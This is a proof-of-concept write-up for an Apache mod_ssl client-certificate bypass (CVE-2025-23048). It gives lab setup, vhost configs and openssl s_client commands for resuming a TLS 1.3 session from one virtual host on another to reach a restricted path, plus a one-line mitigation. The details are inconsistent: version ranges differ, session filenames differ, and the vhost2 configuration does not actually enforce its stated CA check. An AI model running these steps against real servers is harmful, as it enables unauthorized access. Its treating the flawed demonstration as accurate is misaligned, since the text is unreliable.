来源

关联漏洞

描述

Apache HTTP Server versions 2.4.35 – 2.4.63 are vulnerable to a client certificate authentication bypass when TLS 1.3 session resumption is used across virtual hosts with different `SSLCACertificateFile` directives.

介绍

```markdown
# CVE-2025-23048: Apache mod_ssl TLS 1.3 Session Resumption Client Certificate Bypass

**Apache HTTP Server versions 2.4.35 – 2.4.62 are vulnerable to a client certificate authentication bypass when TLS 1.3 session resumption is used across virtual hosts with different `SSLCACertificateFile` directives.**

An attacker with a valid client certificate for one virtual host can resume a TLS 1.3 session on a different virtual host that requires a certificate issued by a distinct CA — gaining unauthorized access to protected resources.

---

## Tested Environment
- Apache HTTP Server: 2.4.57 (Win64)  
- Operating System: Windows 10 (64-bit)  

---

## Server Setup 

### 1. Install Apache 2.4.57 (Win64)
```
```
# Download from: https://www.apachelounge.com/download/VS16/binaries/httpd-2.4.57-win64-VS16.zip
# Extract to C:\Apache24
```

### 2. Enable Required Modules in `conf\httpd.conf`
```apache
LoadModule socache_shmcb_module modules/mod_socache_shmcb.so
LoadModule ssl_module modules/mod_ssl.so
```

### 3. Configure SSL Session Cache
```apache
SSLSessionCache "shmcb:C:/Apache24/logs/ssl_scache(512000)"
SSLSessionCacheTimeout 300
SSLSessionTickets on
```

### 4. Create SSL Directory and Generate Certificates
```bash
cd C:\Apache24\conf
mkdir ssl
cd ssl

# Server cert (self-signed)
openssl req -x509 -newkey rsa:2048 -keyout server.key -out server.crt -days 365 -nodes -subj "/CN=localhost"

# CA1 and client cert for vhost1
openssl req -x509 -newkey rsa:2048 -keyout ca1.key -out ca1.pem -days 365 -nodes -subj "/CN=CA1"
openssl req -newkey rsa:2048 -keyout client_ca1.key -out client_ca1.csr -nodes -subj "/CN=Client1"
openssl x509 -req -in client_ca1.csr -CA ca1.pem -CAkey ca1.key -CAcreateserial -out client_ca1.crt -days 365

# CA2 for vhost2
openssl req -x509 -newkey rsa:2048 -keyout ca2.key -out ca2.pem -days 365 -nodes -subj "/CN=CA2"

# Cleanup
del client_ca1.csr *.srl
```

### 5. Configure Virtual Hosts (`conf\extra\httpd-vhosts.conf`)
```apache
<VirtualHost *:443>
    ServerName vhost1.example.com
    DocumentRoot "C:/Apache24/htdocs/vhost1"
    SSLEngine on
    SSLCertificateFile "C:/Apache24/conf/ssl/server.crt"
    SSLCertificateKeyFile "C:/Apache24/conf/ssl/server.key"
    SSLCACertificateFile "C:/Apache24/conf/ssl/ca1.pem"
    SSLVerifyClient optional
    SSLVerifyDepth 1
    SSLProtocol all -SSLv2 -SSLv3 -TLSv1 -TLSv1.1 -TLSv1.2
    SSLStrictSNIVHostCheck off

    <Location />
        Require ssl-verify-client
    </Location>
</VirtualHost>

<VirtualHost *:443>
    ServerName vhost2.example.com
    DocumentRoot "C:/Apache24/htdocs/vhost2"
    SSLEngine on
    SSLCertificateFile "C:/Apache24/conf/ssl/server.crt"
    SSLCertificateKeyFile "C:/Apache24/conf/ssl/server.key"
    SSLCACertificateFile "C:/Apache24/conf/ssl/ca2.pem"

    SSLVerifyClient optional_no_ca
    SSLVerifyDepth 1
    SSLProtocol all -SSLv2 -SSLv3 -TLSv1 -TLSv1.1 -TLSv1.2
    SSLStrictSNIVHostCheck off

    <Location /restricted>
        Require valid-user
    </Location>
</VirtualHost>
```

### 6. Create Protected Content
```bash
mkdir C:\Apache24\htdocs\vhost1
echo <html><body>Vhost1: Accessible with CA1</body></html> > C:\Apache24\htdocs\vhost1\index.html

mkdir C:\Apache24\htdocs\vhost2\restricted
echo <html><body>Restricted: Vhost2 Secret!</body></html> > C:\Apache24\htdocs\vhost2\restricted\index.html
```

### 7. Start Apache
```bash
C:\Apache24\bin>httpd.exe -k install
C:\Apache24\bin>httpd.exe -k start
```

---

## Proof of Concept 

### Step 1: Full Handshake with `vhost1` → Save Session
```bash
openssl s_client -servername vhost1.example.com -tls1_3 -cert "C:\Apache24\conf\ssl\client_ca1.crt" -key "C:\Apache24\conf\ssl\client_ca1.key" -CAfile "C:\Apache24\conf\ssl\server.crt" -sess_out session_v1.pem 127.0.0.1:443
```
**Input after connection:**
```
GET / HTTP/1.1
Host: vhost1.example.com
```
![Apache](poc1.jpg)
--------------------------------------------------------------------
**Expected Output (truncated):**
```
New, TLSv1.3, Cipher is TLS_AES_256_GCM_SHA384
...
Post-Handshake New Session Ticket arrived:
...
HTTP/1.1 200 OK
...
<html><body>Vhost1: Accessible with CA1</body></html>
```

> Session ticket saved to `session_shared.pem`.

---

### Step 2: Resume Session on `vhost2` → Access Protected Path
```bash
openssl s_client -servername vhost2.example.com -tls1_3 -CAfile "C:\Apache24\conf\ssl\server.crt" -sess_in session_v1.pem 127.0.0.1:443
```

**Input:**
```
GET /restricted/ HTTP/1.1
Host: vhost2.example.com

```

**Expected Output (Critical):**
```
SSL-Session:
    Protocol  : TLSv1.3
    Cipher    : TLS_AES_256_GCM_SHA384
    Resumption PSK: ...
    TLS session ticket lifetime hint: 300 (seconds)
...
HTTP/1.1 200 OK
...
<html><body>Restricted: Vhost2 Secret!</body></html>
```
![Apache](poc2.jpg)
--------------------------------------------------------------------
> **Client certificate from CA1 was accepted on vhost2 (which trusts only CA2)**  
> **No re-authentication occurred — session resumption bypassed CA check**

---

## Mitigation

```apache
SSLStrictSNIVHostCheck on
```
in **all** TLS 1.3 virtual hosts requiring distinct client CAs.

> Disables cross-SNI session resumption — prevents bypass.

---

文件快照

 [4.0K]  /data/pocs/918e0020d8d7b7f7229afa4bfa22efe817419332
├── [146K]  poc1.jpg
├── [ 83K]  poc2.jpg
└── [5.1K]  README.md

0 directories, 3 files

备注